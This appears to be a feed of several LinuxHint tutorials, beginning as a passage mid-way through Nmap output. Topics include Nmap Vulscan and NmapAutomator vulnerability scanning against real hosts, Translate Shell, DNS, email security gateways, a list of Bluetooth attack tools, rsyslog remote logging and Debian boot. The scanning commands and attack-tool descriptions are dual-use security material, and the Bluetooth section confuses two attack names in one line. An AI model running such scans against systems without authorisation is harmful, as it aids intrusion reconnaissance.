2001/tcp filtered dc
2002/tcp filtered globe
2003/tcp filtered finger
2004/tcp filtered mailbox
2005/tcp filtered deslogin
2006/tcp filtered invokator
2007/tcp filtered dectalk
2008/tcp filtered conf
2009/tcp filtered news
2010/tcp filtered search
6666/tcp filtered irc
6667/tcp filtered irc
6668/tcp filtered irc
6669/tcp filtered irc
9100/tcp filtered jetdirect
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 632.44 seconds

From the scan above we understand the process is to find available services to then run tests for all known vulnerabilities for the service detected, contained in Vuls vulnerabilities database.

You can allow Nmap version detection while omitting Vuls version detection by adding the flag –script-args vulscanversiondetection=0.

# nmap -sV --script=vulscan/vulscan.nse --script-args vulscanversiondetection=0
linuxhint.com

Vulscan allows you launch interactive scans in which you are allowed to determine if a specific service must be scanned for vulnerabilities, to achieve it you need to apply the option –script-args vulscaninteractive=1.

On the console run:

#  nmap -sV --script=vulscan/vulscan.nse --script-args vulscaninteractive=1 linuxhint.com

The scan will halt to ask you if it should proceed checking vulnerabilities for Nginx:

The argument vulscanshowall allows to print results according to accuracy, the lower value will print all results, while increasing the value results will get reduced to better matches.

# nmap -sV --script=vulscan/vulscan.nse --script-args vulscanshowall=1 linuxhint.com

The following options allow to determine the format in which Nmap will show the output, the option vulscanoutput=details enables the most descriptive output, by running it Nmap will show additional information for each script.

# nmap -sV --script=vulscan/vulscan.nse --script-args vulscanoutput=details linuxhint.com

The listid option will print the results as a list of vulnerabilities identified by their ID.

# nmap -sV --script=vulscan/vulscan.nse --script-args vulscanoutput=listid linuxhint.com

The option listlink prints a list of links to the vulnerabilities database with additional information on each one.

# nmap -sV --script=vulscan/vulscan.nse --script-args vulscanoutput=listlink linuxhint.com

Finishing with output formats, the option listtitle will print a list of vulnerabilities by name.

# nmap -sV --script=vulscan/vulscan.nse --script-args vulscanoutput=listtitle linuxhint.com

Finally, to end this tutorial keep in mind for Vuls to give the best you must seek the databases to remain up to date. To update Vuls databases always download the last version of the files in the following urls and keep them saved on Vuls main directory (where databases with same names are already stored in):

I hope you found this tutorial on how to use Nmap Vulscan useful, keep following LinuxHint for more tips and updates on Linux.

]]>
Translate words from English into other language on Linux Terminal https://linuxhint.com/translate_language_on_linux_terminal/ Tue, 04 Feb 2020 18:30:33 +0000 https://linuxhint.com/?p=54588 This tutorial shows how to easily translate words from English into other languages on a Linux terminal. It also shows how to specify source language or more than a single destination language on the Linux terminal, how to identify languages without carrying out the translation process, how to identify languages from the terminal among more useful techniques to deal with languages.

For this tutorial the software used is Translate Shell, previously known as Google Translate CLI.

Translate Shell allows you to use Google Translate, Bing Translator, Yandex Translator and Apertium from the command line, while including all translation engines mentioned above Google is the default one.

Before downloading Translate Shell you need to get the gawk package by running:

# apt install gawk -y

Once installed download Translate Shell using wget by running:

# wget git.io/trans

Note: on Debian and based Linux distributions you can install wget by running apt install wget.

Once downloaded give Translate Shell execution rights by running:

# chmod +x trans

Lets try by translating a single word from Italian (to English since English is the default destination language). To translate the word pinguino run:

Translate a single word on Linux terminal:

# ./trans ‘pinguino’

Note: using quotation marks is optional for single words and mandatory for sentences.

As you can see Translate Shell detected the source language as Italian and translated it to English despite the destination language wasn’t specified.

Now let’s translate the same word from English to Spanish. To specify a destination language use “:” followed by the destination language as in the example below:

# ./trans :es penguin

As you can see, Translate Shell translated it properly.

Translate more than a single word on Linux terminal:

Now let’s translate more than a single word, the following example shows the “Linux hint” translation, note for more than a single word quotation marks are mandatory.

# ./trans :es 'Linux hint'

Translate words from English into several other languages on Linux terminal:

Translate Shell also allows you to translate to different destination languages, the following example shows how to translate the sentence “At LinuxHint we seek the best content quality for readers” to Spanish and Chinese simultaneously by just separating language codes with a + symbol:

# ./trans :es+zh 'At LinuxHint we seek the best content quality for readers'

Specify the source language when translating words into other language on Linux terminal:

Sometimes translators fail to auto detect the source language, Translate Shells supports source language specification by placing the source language code before colon:

# ./trans zh: '在LinuxHint,我们为读者寻求最佳的内容质量'

Specify both source and destination languages when translating on LInux terminal:

Of course you can specify both source and destination languages:

# ./trans zh:es '在LinuxHint,我们为读者寻求最佳的内容质量'

Detect languages on Linux Terminal using Translate Shell:

You can use Translate Shell also to detect languages only, without proceeding with translation, obtaining additional information on the detected language by adding the -id flag as shown in the example below:

# ./trans -id "我们为读者寻求最佳的内容质量"

Translate files from English into other language on Linux terminal:

Translate Shell also allows you to translate files. Using nano or any text editor you want create a text file with content on any language you want to translate to test Translate Shell.

# nano linuxhint-translation

Then press CTRL+X to save and exit

To translate the content to Spanish use the syntax shown below adding file://<Path-To-File> as content source to translate:

# ./trans :es file://linuxhint-translation

Translate websites into other language on Linux terminal:

With Translate Shell it is possible to translate websites too using the syntax shown below to translate linuxhint.com.

# ./trans :es https://linuxhint.com

As you can see Translate Shell returned a URL with a version of LinuxHint in Spanish:

https://translate.google.com/translate?hl=en&sl=auto&tl=es&u=https://linuxhint.com

Translate words into other language on Linux terminal with interactive mode:

Translate Shell also offers an interactive mode, the following example shows how to launch the interactive mode to translate content from Spanish to English:

# ./trans -shell es:en

Using Translate Shell as dictionary:

Translate Shells can be also used as dictionary if the option -d is implemented, the following example shows Translate Shells being used as dictionary for the word “encrypt”:

# ./trans -d en: encrypt

Play sound to include spoken translation in the output:

To end this tutorial lets add sound to hear translations, to achieve it you need to install a terminal media player such as mplayer, on Debian and based Linux distributions run:

# apt install mplayer -y

Play sound to include spoken translation in the output:

Once installed, use the option -p to add sound to the output, the following example shows how to translate from Chinese to Spanish including the spoken translation:

I hope you found this tutorial on how to translate words from English into other language on Linux terminal useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
What is DNS and how does it work https://linuxhint.com/what_is_dns/ Tue, 04 Feb 2020 18:25:56 +0000 https://linuxhint.com/?p=54571 This tutorial aims to explain, in the simplest way, what DNS (the Domain Name System) is and how it works. This article focuses on the most common processes and does not include exceptions (except for cached domains) in order to describe the whole process most of domain name resolutions pass through. In this tutorial only IPv4 examples are given, but the process remains the same for IPv6 protocol.

What is the DNS (Domain Name System)?

Every device on an IPv4/IPv6 network has a unique identifier, an address called IP address (Internet Protocol address), this address is useful for the device to be identified and reached by other devices. Users familiarized with IPv4 know IP addresses consists of 4 octets ranging between 0 and 255 like 123.221.200.3.

Every website or service we communicate with on the internet has a unique IP address which allows us to reach it accurately, for example, if we want to reach Google we are reaching the IP address 172.217.172.110.

For humans, remembering each IP address for each website or service we use is impossible, or at least not a friendly way to remember website addresses, and that’s where domain names, friendly to human users, such as LinuxHint.com came to our aid.

While each device has a unique IP address, every IP address can be associated with a domain name to ease its communication or exposure before humans.

Therefore, if you have a device from which you want to serve others, or you want to be found easily you can associate it with a human friendly name, called a domain name, these usually starting with www.

DNS (Domain Name System and NOT Domain Name Server) is the system through which domain names are translated into IP addresses. We can think about the Domain Name System as a translator from friendly www.domain.com to IPv4 addresses X.X.X.X (or IPv6 addresses too). And this “translation” process is called “DNS resolution”.

How the DNS (Domain Name System) works?

The Domain Name System (DNS) is achieved through 4 different types of servers: the DNS recursive resolver, the Root Name Server, the Top-Level Domain Name Server and finally the DNS Name Server.

The whole sequence can be summarized as:

Your Browser > DNS Recursive Resolver > Root Name Server > Top Level Domain Server > DNS Name Server.

The DNS Recursive Resolver is the first step of the DNS resolution process, it is the server which receives the user query to continue with the resolution process (also called DNS lookup). The DNS Recursive Resolver receives the user request for the domain name translation into IP address and passes the request to the Root Name Server, the DNS Recursive Resolver has a list containing all Root Name Servers addresses to find them.

The Root Name Server is the second step in the process and can resolve the request for the Recursive Resolver with the cached information or by delivering the request to the Top Level Domain (such as .com, .org, .net, .edu or .gov) which contains information on all domains belonging to that Top Level, so if the requested domain is a .com, the Top Level Domain server will be the .com TLD server and then the request is sent to the DNS server which contains the IP address, sends it to the Recursive Resolver which sends the client who requested the resolution the proper translation or resolution translated into an IP address.

The exception for the steps above is when a recent domain name resolution was saved in the cache by the Resolver.

The process described above is in many cases omitted due DNS caching, the Recursive Resolver, or the Root Server can store domain name server resolution information cached in order to increase performance preventing the whole process, in such cases the domain resolution will be faster and some of the servers mentioned above won’t intervene, that’s the reason why sometimes we update our DNS records in our hosting and changes take minutes or hours to take place, because DNS caches should refresh.

When a Recursive Resolver gets resolution information, it caches the information and it is used for next resolutions saving the whole process explained before.

Linux has a variety of commands to deal with DNS resolution you can find at https://linuxhint.com/common_dns_tools/.

I hope you found this explanation on what DNS are and how they work useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
How to use Nmap automator https://linuxhint.com/nmapautomator/ Wed, 29 Jan 2020 11:15:51 +0000 https://linuxhint.com/?p=54253 This tutorial focuses on NmapAutomator, a Linux shell script which automates Nmap scanning tasks.  NmapAutomator is an easy and fast alternative to scan targets, it includes different scan modes including scanning for vulnerabilities by integrating additional tools such as Nikto or GoBuster, while it may be a good introduction to Nmap this script has few limitations, for example, it doesn’t allow to scan domain names but IP addresses only.

Installing dependencies before using NmapAutomator:

Before starting with NmapAutomator let’s solve some dependencies, the first one is Go, you can download it from https://golang.org/dl/.

Once downloaded install it by extracting the content in the directory /usr/local by running:

# tar -C /usr/local -xzf go1.13.6.linux-amd64.tar.gz

Export the path by running:

# export PATH=$PATH:/usr/local/go/bin

Now lets install GoBuster, a security scanner by running:

# go get github.com/OJ/gobuster

Finally lets install Nikto by running:

# apt install libwhisker2-perl nikto

Now we can proceed to download NmapAutomator using git:

# git clone https://github.com/21y4d/nmapAutomator.git

Get inside the NmapAutomator directory and give the script execution permissions by running:

# chmod +x nmapAutomator.sh

Optionally, to make it executable even if you aren’t inside the directory run:

# ln -s nmapAutomator.sh /usr/local/bin

To be able to scan in mode Vulns you need to install the nmap-vulners script.
To do it first move into the Nmap scripts directory by running:

# git clone https://github.com/vulnersCom/nmap-vulners.git

Copy the .nse files into the directory /usr/share/nmap/scripts

# cp *.nse /usr/share/nmap/scripts

Finally update nmap scripts database by running:

# nmap --script-updatedb

How to use NmapAutomator:

Lets scan linuxhint.com, as I said previously NmapAutomator doesn’t work with domain names but only with targets identified by their IP address, to learn LinuxHint.com IP address I use the command host:

# host linuxhint.com

Before proceeding with the scan lets clarify NmapAutomator supports 6 types of scans:

Quick scan: checks for open ports only.

Basic scan: first checks for open ports to specifically scan them later.

UDP scan: it is a basic scan but directed against UDP services.

Full scan: this mode scans the whole ports range through a SYN Stealth scan and then carries out an additional scan on opened ports.

Vulns scan: this type of scan checks the target for vulnerabilities.
Recon:
this option executes a Basic scan.

All: this type runs all scans previously mentioned, of course without duplication of tasks.

To begin with examples, let’s try the Quick scan against LinuxHint.

# ./nmapAutomator.sh 64.91.238.144 Quick

As you can see the scan process was pretty fast and reported on opened ports.

The following example shows the basic mode in which after finding opened ports Nmap scans them gathering additional information.

#  ./nmapAutomator.sh 64.91.238.144 Basic

Zoom of result extract:

The following example shows a Basic scan focused on UDP ports:

#  ./nmapAutomator.sh 64.91.238.144 UDP

The following example shows the Vulns scan for which we installed nmap-vulners.
First Nmap will check for available services in the target to check them for security holes or vulnerabilities later similarly to when we use the script the NSE (Nmap Scripting Engine) as shown at https://linuxhint.com/nmap-port-scanning-security/ or https://linuxhint.com/nmap_banner_grab/.

#  ./nmapAutomator.sh <Target> Vulns

As you see the Vulns type of scan revealed many possible vulnerabilities or security holes.

The following scan is also interesting like the previous, for this mode you need to install other scanners such as nikto. This scan starts with a basic scan and then continues with a vulnerability scanner.

CLARIFICATION: in order to show real vulnerabilities reports the first screenshot of the Recon scan shows LinuxHint but the vulnerability results belong to a different target.

#  ./nmapAutomator.sh 64.91.238.144 Recon

Select any additional scanner you want, I selected Nikto. In case you want to learn more about Nikto you can read the article at https://linuxhint.com/nikto_vulnerability_scanner/.

Below you can see Nikto’s reports on found vulnerabilities:

As you could see many vulnerabilities were found, probably many false positive reports, something usual when scanning for vulnerabilities.

Below you can see an example of a Full mode scan:

#  ./nmapAutomator.sh 64.91.238.144 Full

Conclusion on NmapAutomator:

NmapAutomator resulted in a very nice tool despite its limitation to use domain names. As you could see the script managed to direct Nmap properly finding a lot of vulnerabilities. The integration with additional scanners like Nikto is very useful and represents, to my taste, the biggest advantage of this script.

If you don’t have time to read on Nmap or deal with GUI scanners such as OpenVas or Nessus this script is a great solution to shoot complex scans fast and in a simple way.

I hope you liked this tutorial on how to use NmapAutomator.

]]>
Best Open Source Secure Email Gateway Packages https://linuxhint.com/best_open_source_secure_email_gateway/ Tue, 28 Jan 2020 12:13:04 +0000 https://linuxhint.com/?p=54152 Secure Email Gateways or Email security gateways are gateways designed to filter mail traffic. Some mail providers and other types of organizations implement this solution to fight attacks like phishing, email-borne attacks, viruses, malwares and more attacks which can be filtered by an email gateway, but it also can prevent information leak by infidel members of the organization, etc. It is a controller of mail content which rules according to the specified rules and policies.

Email Secure Gateways are available as a cloud service, as virtual appliance, locally at the mail server and there are both software and hardware solutions but this article focuses on 5 Email Security Gateways: MailScanner, MailCleaner, Proxmox, Hermes Secure Email Gateway and OrangeAssasin, all them include free versions while some offer additional paid versions with extra features.

MailScanner

MailScanner is among the most popular open source solutions for secure email gateways. It prevents attacks through spam using Spamassassin, viruses integrating third party antivirus such as Clam AV, phishing, malware and more.

MailScanner can be installed as gateway or integrated with mail gateways such as MailCleaner mentioned below in this article.

Installing MailScanner is pretty simple, you can get packages for Debian and Red hat based Linux distributions at https://github.com/MailScanner/v5/tree/master/builds, it is highly recommended to install it on a clean OS. Around 80 billion of emails are supervised by MailScanner monthly, it shows high performance on low resources hardware too. A comprehensive guide of configuration options for MailScanner to understand all its fueatures is available at https://www.mailscanner.info/MailScanner.conf.index.html.

MailCleaner

MailCleaner is another open source alternative for email secure gateway, Like the rest of solutions it features antispam, antivirus protection, quarantine, newsletter detection and web based administration interface.

MailCleaner is ready to be installed on any virtualization platform, it works as MX record for the domain name.  It is built on Debian 8 and uses MailScanner which heads this list. Like the rest of gateways it offers an intuitive web interface which unificates all functionalities. Out of the community edition, MailCleaner offers paid addons (SpamHaus Professional RBLs and Kaspersky Antivirus).The paid version offers automatic updates every 15 minutes, access to professional anti spam rules and antivirus, while the free version offers free ClamAV and basic rules. The paid version also features an IP list to detect newsletter, additionally to the rules included in the free version. RBL and UriBL also differ from the free to paid version, the paid version includes a Byesian automatically updated filter, managed setup , addons and premium support, while the community edition has support only through the forum. Still on its free version MailCleaner is among the best Open Source solutions in the market.

MailCleaner email secure gateway can be downloaded from https://www.mailcleaner.org/download/.

Proxmox Mail Gateway

Proxmox Mail Gateway is another market leading technology to filter mail threats. It is  very user friendly with  a web management interface. It is Debian and Ubuntu based virtualized system and can be downloaded from https://www.proxmox.com/en/downloads.

Proxmox works through many methods which include receiver corroboration to confirm the email receiver is a real existent user. It also checks SPF (Sender Policy Framework) in order to validate the sender and prevent email forgery. DNS-based Blackhole List (DNSBL) is another method used by Proxmox which checks for blacklisted IP addresses known for spammy activity. It also features a SMTP whitelist which allows you to filter by email address, domain name, regular expressions and IP address, black and white lists are widely used in Proxmox and all other options mentioned in this article. It also can detect problematic domains through SURBL.

Auto Learning algorithms and a Beyesian filter complete this software adding development intelligence. Customizing Proxmox is pretty easy with an object rule system which makes it easy to filter users, domains, time frames, content and measures to be taken according to scan results. Proxmox is, together with MailScanner, one of the best open source solutions in the market for Mail Secure Gateway.

Hermes Secure Email Gateway

Hermes Unified Secure Email Gateway is another Open Source solution based on Ubuntu Server. While Hermes Secure Email Gateway is open source, it is offered in 3 formats:

Hermes SEG Community: this is the free version without support (support is available through forum), without warranty and without possibility to self host all features.
Hermes SEG Pro:
this license allows you to self host all features.
Hermes SEG SaaS:
this service includes SEG Pro + a management service.

Hermes Unified Secure Email Gateway helps to fight virus, malwares, spam and other threats such as mail forgery aided by SPF, DKIM (DomainKeys Identified Mail), DMARC (Domain-based Message Authentication). The “Unified” on its name refers to the integration of tools such as Postfix, SpamAssasin, ClamAV and others whose management is unified through a unique web interface similarly to Proxmox. Hermes can be installed locally or as a cloud solution. You can get the community edition for free at https://github.com/deeztek/Hermes-Secure-Email-Gateway.

OrangeAssasin

OrangeAssasin is the last of this list, another free open source secure email gateway which supports incorporating plugins with additional features. Orange Assassin portrays itself as an upgraded replacement for SpamAssasin. Among all products listed in this article Orange Assassin is the less empirically backed (the less used).

You can get OrangeAssasin for free at https://github.com/SpamExperts/OrangeAssassin.

Conclusion:

All products mentioned are almost the same and friendly users without major differences between them. Considering 90% of mails are spam incorporating a Secure Email Gateway solution is a must if you plan to setup a mail server. All solutions numerated here are available for virtualized environments and can be tested without risks. From all solutions mentioned above probably the most recommendable by the community are MailScanner and MailCleaner.

I hope you found this article on Best Open Source Secure Email Gateway Packages useful.

]]>
BlueTooth Security Risks https://linuxhint.com/bluetooth_security_risks/ Thu, 23 Jan 2020 07:12:20 +0000 https://linuxhint.com/?p=53970 Security risks involving bluetooth vulnerabilities include techniques known as:  bluebugging, bluesnarfing, bluejacking, denial of service and exploits for different holes.

When a device is configured in discoverable an attacker may try to apply these techniques.

Today mobile security was strongly increased and most attacks fail, yet sometimes security holes are discovered and new exploits emerge. As mobile devices prevent the user from installing unmonitored software freely most of attacks are difficult to carry out.

This tutorial describes the most common Bluetooth attacks, the tools used to carry out these attacks and the security measures users can take to prevent them.

Bluetooth Security Risks:

Bluebugging:
This is the worse known type of Bluetooth attack, through it an attacker gets full control of the device, if the hacked device is a mobile phone the attacker is able to make phone calls and send messages from the compromised device, remove or steal files, use the phone’s mobile connection, etc. Formerly a tool called Bloover was used to carry out this type of attacks.

BlueSnarfing:
Bluebugging attacks target the device’s stored information such as media, contacts, etc. yet without granting the attacker full control over the device as other type of attacks do (as described alter below).

Bluesniping:
Similar to BlueSnarfing but with longer range, this attack is carried out with special hardware.

BlueJacking:
This attack consists of sending (only) information to the victim, such as adding a new contact, replacing the contact name for the desired message. This is the less damaging attack despite some tools may allow the attacker to reset or to turn off the victim’s cell phone, still it remains useless to steal information or violate the victim’s privacy.

KNOB:
Recently reports on a new kind of attack were released by researchers who discovered the handshaking process, or negotiation between 2 bluetooth devices to establish a connection can be hacked through a Man In the Middle attack by sending a byte encryption key allowing a bruteforce attack.

Denial of Service (DOS):  widely known Denial of Service attacks also target bluetooth devices, the BlueSmack attack is an example of this. These attacks consist of sending oversized packets to bluetooth devices in order to provoke a DOS. Even attacks killing the battery of bluetooth devices were reported.

Tools used to hack Bluetooth devices:

Below I set a list of the most popular tools used to carry out attacks through bluetooth, most of them are already included in Kali Linux and Bugtraq.

BlueRagner:
BlueRanger locates Bluetooth devices radio by sending l2cap (bluetooth pings) exploiting allowance to ping without authentication.

BlueMaho:
This tool can scan devices looking for vulnerabilities, it shows detailed information on scanned devices, it also shows current and previous device locations, it can keep scanning the environment unlimitedly and alert through sounds when a device is found and you can even define instructions for when a new device is detected and can be used with two bluetooth devices (dongles) simultaneously. It can check devices for both known and unknown vulnerabilities.

BlueSnarfer:

BlueSnarfer, as it name says, was designed for BlueSnarfing, it allows the attacker to get the victim’s contact address, a list of made and received calls, the contacts saved in the sim, among it features it also allows to customize the information printing.

Spooftooph:
This tool allows you to carry out spoofing and cloning attacks against bluetooth devices, it also allows generating random bluetooth profiles and changing them automatically each X time.

BtScanner:

BtScanner allows you to gather information from bluetooth devices without prior pairing. With BtScanner an attacker can get information on HCI (Host Controller Interface protocol) and SDP (Service Discovery Protocol).

RedFang:

This tool allows you to discover hidden bluetooth devices which are set not to be discovered. RedFang achieves it through bruteforce to guess the victim’s bluetooth MAC address.

Protect your Bluetooth devices against security risks:

While new devices are not vulnerable to attacks mentioned previously all time new exploits and security holes emerge.
The only safe measure is to keep the bluetooth turned off as much as you don’t use it, in the worst case you need it always turned on at least keep it undiscoverable despite as you saw there are tools to discover them anyway.

Your mobile devices, or devices with bluetooth support must remain updated, when a security hole is discovered the solution comes through updates, an outdated system may contain vulnerabilities.

Restrict permissions on the bluetooth functionalities, some applications require bluetooth access permissions, try to limit permissions on the bluetooth device more as possible.

Another point to take in consideration is our location when we use bluetooth devices, enabling this functionality in public places full of people isn’t recommended.

And of course, you should never accept pairing requests, and if you get unknown pairing request turn off your bluetooth immediately, some attacks take place during the handshake negotiation (authentication).

Don’t use third party apps which promise to protect your bluetooth, instead keep a safe configuration as said before: turn off or hide the device.

Conclusion:

While bluetooth attacks aren’t widely used (when compared with other types of attacks like phishing or DDOS) almost every person carrying a mobile device is a potential victim, therefore in our countries most people are exposed, also through bluetooth, to sensitive data leak. On the other hand most manufacturers already patched devices to protect them from almost all attacks described above, but they only can issue a fix after the vulnerability was discovered and published (like with any vulnerability).

While there is not defensive software the best solution is to keep the device turned off in public spaces, since most attacks require a short range you can use the device safely in private places. I hope you found this tutorial on Bluetooth Security Risks useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
How to Send Linux Logs to a Remote Server https://linuxhint.com/send_linux_logs_remote_server/ Thu, 23 Jan 2020 07:02:07 +0000 https://linuxhint.com/?p=53993 The main reason to apply remote logging is the same reason because of which a dedicated /var partition is recommended: a matter of space, but not only. By sending logs to a dedicated storage device you can prevent your logs from taking all the space while keeping a huge historical database to afford bugs.

Uploading logs to a remote host allows us to centralize reports for more than one device and to keep a report backup to research in case something fails preventing us from accessing logs locally.

This tutorial shows how to setup a remote server to host logs and how to send these logs from client devices and how to classify or divide logs in directories by client host.

To follow instructions you can use a virtual device, I took a free tier VPS from Amazon (if you need help setting up an Amazon device they have great  dedicated content on it on LinuxHint at https://linuxhint.com/category/aws/). Note the server public IP is different than its internal IP.

Prior to starting:

The software used to send logs remotely is rsyslog, it comes by default on Debian and derived Linux distributions, in case you don’t have it run:

# sudo apt install rsyslog

You can always check the rsyslog state by running:

# sudo service rsyslog status

As you can see the status on the screenshot is active,  if your rsyslog isn’t active you can always start it by running:

# sudo service rsyslog start

Or

# systemctl start rsyslog

Note: For additional information on all options to manage Debian services check Stop, start and restart services on Debian.

Starting rsyslog isn’t relevant right now because we will need to restart it after making some changes.

How to Send Linux Logs to a Remote Server: The Server Side

First of all, on the server edit the file /etc/resyslog.conf using nano or vi:

# nano /etc/rsyslog.conf

Within the file, uncomment or add the following lines:

module(load="imudp")
input(type="imudp" port="514")
module(load="imtcp")
input(type="imtcp" port="514")

Above we uncommented or added logs receptions through UDP and TCP, you can allow only one of them or both them, once uncommented or added you’ll need to edit your firewall rules to allow incoming logs, to allow logs reception through TCP run:

# ufw allow 514/tcp

To allow incoming logs through UDP protocol run:

# ufw allow 514/udp

To allow through both TCP and UDP run the two commands above.

Note: for more information on UFW you can read Working with Debian Firewalls (UFW).

Restart rsyslog service by running:

# sudo service rsyslog restart

Now continue on the client to configure sending logs, then we’ll get back to the server to improve the format.

How to Send Linux Logs to a Remote Server: The Client Side

On the client sending logs add the following line, replacing the IP 18.223.3.241 for your server IP.

*.* @@18.223.3.241:514

Exit and save changes  by pressing CTRL +X.

Once edited restart the rsyslog service by running:

# sudo service rsyslog restart

On the server side:

Now you can check logs inside /var/log, when opening them you’ll notices mixed sources for your log, the following example shows logs from Amazon’s internal interface and from the Rsyslog client (Montsegur):

A zoom shows it clear:

Having mixed files isn’t comfortable, below we will edit rsyslog configuration to separate logs according to the source.

To discriminate logs inside a directory with the name of the client host add the following lines to the server /etc/rsyslog.conf to instruct rsyslog how to save remote logs, to do it within the rsyslog.conf add the lines:

$template RemoteLogs,"/var/log/%HOSTNAME%/.log"
*.* ?RemoteLogs
& ~

Exit saving changes by pressing CTRL +X and restart rsyslog on the server again:

# sudo service rsyslog restart

Now you can see new directories, one called ip-172.31.47.212 which is AWS internal interface and other called “montsegur” like the rsyslog client.

Within the directories you can find the logs:

Conclusion:

Remote logging offers a great solution to a problem which can bring services down if the server storage becomes full of logs, as said in the beginning, it is also a must in some cases in which the system may be seriously damaged without allowing access to logs, in such cases a remote log server guarantees sysadmin access to the server history.

Implementing this solution is technically pretty easy and even free considering high resources aren’t need and free servers like AWS free tiers are good for this task, should you increase log transference speed you can allow UDP protocol only (despite losing reliability). There are some alternatives to Rsyslog such as: Flume or Sentry, yet rsyslog remains the most popular tool among Linux users and sysadmins.

I hope you found this article on How to Send Linux Logs to A remote server useful.

]]>
Understanding Debian Boot Process Step by Step https://linuxhint.com/debian_boot_process/ Wed, 22 Jan 2020 20:01:48 +0000 https://linuxhint.com/?p=53922 This article explains Debian Linux boot process step by step starting from the BIOS to the /sbin/init execution including the boot loader, init and init.

The first software to be executed when you turn on your PC is the BIOS, followed by the boot loader (GRUB, LILO in other systems) usually installed on the MBR (Master Boot Record), then the /init program with the initramfs image in memory as the temporary root file system and then executes the /sbin/init while switching the root file system to the disk.

Let’s start with each step, beginning with the BIOS.

The Debian Boot Process: The BIOS

The BIOS is the first software interacting with the hardware, it starts all devices,
depending on its configuration which usually we can access by pressing Del or F2.

From the BIOS configuration we can define how the boot process will continue, usually the BIOS configuration panel contains a menu dedicated to the boot process in which we can define if the next step will be to boot from the hard disk, an external drive or USB stick, an optical disk like a DVD, network book, etc.

As said before, the BIOS initializes the hardware and its configuration panel let us enable and disable certain hardware both definitively or during the boot process.

The BIOS also contains information on the hardware temperature, cooler health, RAM, storage devices, virtualization support, processor and cores among more options.

Almost always when troubleshooting a PC among the first steps there is work with the BIOS. In IT Security the BIOS plays a key role preventing local vulnerabilities exploitation, a wrong configuration may lead to security and functional failures.
In an usual Debian Boot Process the next step after the BIOS initialization is the Boot Loader which usually occupies the second step in the process.

The Debian Boot Process: The Boot Loader

Within the first 2 blocks of a storage device there is the MBR (Master Boot Record) which contains information on the partitioning, filesystem. Many users confuse the MBR with the Boot Loader, the MBR is a defined location within a block device while Boot Loader is a program of higher lever, which the user can easily manipulate. The Boot Loader is what Debian users know as GRUB, other Linux users may know it as LILO, SysLinux, Windows Boot Manager for Windows users, etc.

From the Boot Loader we can determine how next steps will be carried out, we can edit define different OS, kernels and startup parameters.

By default Debian brings GRUB as Boot Loader, GRUB configuration file can be found at /boot/grub/menu.lst and the bootloader must be updated by running the command update-grub to test and apply any change.

The Boot Loader allows us to boot in recovery mode or mount the OS with root privileges to fix issues or reset the password, like happens with the BIOS, the GRUB loader is also of interest for IT security.

Just like the BIOS defined the steps for the Boot Loader, the Boot Loader defines the the settings for the /init process which prepares the PC for the last step.

The Debian Boot Process: The /init

The /init is a shell script running within the initramfs initializing the kernel, at this stage you should know the /init initializes the kernel compressed as cpio.

The Debian Boot Process: The /sbin/init

Here is where the OS initializes. The runlevel N (boot) initializes only necessary scripts to pass to runlevel S (Single user) to end initializing the hardware and then switches to a runlevel ranging between 2 and 5 to start system services.
Below you can see a list including all runlevels and their meaning:

RunLevel Support Task
N None  
0 Shutdown Shutdown, its directory is /etc/rc0.d/
1 Single User Single user, its directory is /etc/rc1.d/
2 Multi User without network Multi User without network, at /etc/rc2.d/
3 Multiuser with networking Multi User with network, at /etc/rc3.d/
4 Multiuser with networking Multiuser with networking, at /etc/rc4.d/
5 Multiuser with graphics Multi user, X11, its directory is /etc/rc5.d/
6 Reboot Reboot

The runlevel directories link to scripts located in the /etc/init.d/, this is a directory where an administrator can locate scripts to be executed at boot.

The /sbin/init is the last step in Debian Linux and derived distributions, it will bring the OS up to the proper runlevel.

This boot process is really simple to understand, any user, even when not familiarized with Linux already knows steps like BIOS and Boot Loader.

I hope you found this article helped you to Understand the Debian Boot Process Step by Step.

]]>